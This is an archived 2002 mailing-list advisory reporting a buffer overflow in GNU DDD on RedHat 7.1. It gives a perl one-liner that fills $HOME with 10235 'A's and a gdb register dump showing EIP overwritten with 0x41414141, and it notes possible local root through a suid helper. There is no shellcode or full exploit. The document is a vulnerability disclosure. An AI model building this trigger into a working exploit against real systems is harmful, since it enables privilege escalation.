Werd...

========================================================================
Program  : ddd
OS       : Linux
DISTRO   : RedHat 7.1
Issue    : 0x41414141 (no core tho)
Home Page: http://www.gnu.org/software/ddd/
suid     : No
sgid     : No
Issue    : ddd may be called by an suid helper binary and could be
           exploited to gain local root access.

GNU DDD, the Data Display Debugger, is a GUI to command-line debuggers
like GDB, DBX, JDB, XDB, Ladebug, WDB, the Perl debugger, or the Python
debugger. It provides a graphical data display where complex data
structures can be explored incrementally and interactively.
========================================================================

Normally I use gdb to debug cores but today I decided to try ddd and my
efforts failed. When I set the $HOME in my test account to 10235 A's and
I tried to run ddd like (I found an evolution core that will be explained
in my next post):

sh-2.04$ export HOME=`perl -e'print "A" x 10235'`
sh-2.04$ ddd /usr/bin/evolution

I get a bunch of A's that spew to my console and then some memory access
errors as seen below:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... blah blah... /.ddd/themes/" failed: File name too long
/tmp/dddNhatCp:3: Error in sourced command file:
Cannot access memory at address 0x41414141
<ctrl-c>

So... in light of this... I decided to use gdb to debug ddd which uses
gdb.. heh... Here is a dump of the registers...
eax            0x8572ec4        139931332
ecx            0x0              0
edx            0xbfffbc20       -1073759200
ebx            0x41414141       1094795585
esp            0xbfffbc20       0xbfffbc20
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x10246          66118
cs             0x23             35
ss             0x2b             43
ds             0x2b             43
es             0x2b             43
fs             0x0              0
gs             0x0              0
fctrl          0x37f            895
fstat          0x120            288
ftag           0xffff           65535
fiseg          0x23             35
fioff          0x400bf242       1074524738
foseg          0x2b             43
fooff          0xbfffac86       -1073763194
fop            0x6a             106

smashed ;o)

--
-l0rt-
Secure Network Operations
Strategic Reconnaissance Team
Team Key ID: ACFCBD01
l0rt Key ID: 47BF3F87
------------------------------------------
"That secret you've been guarding, isn't."
This archive was generated by hypermail 2b30 : Tue Jan 15 2002 - 12:58:37 PST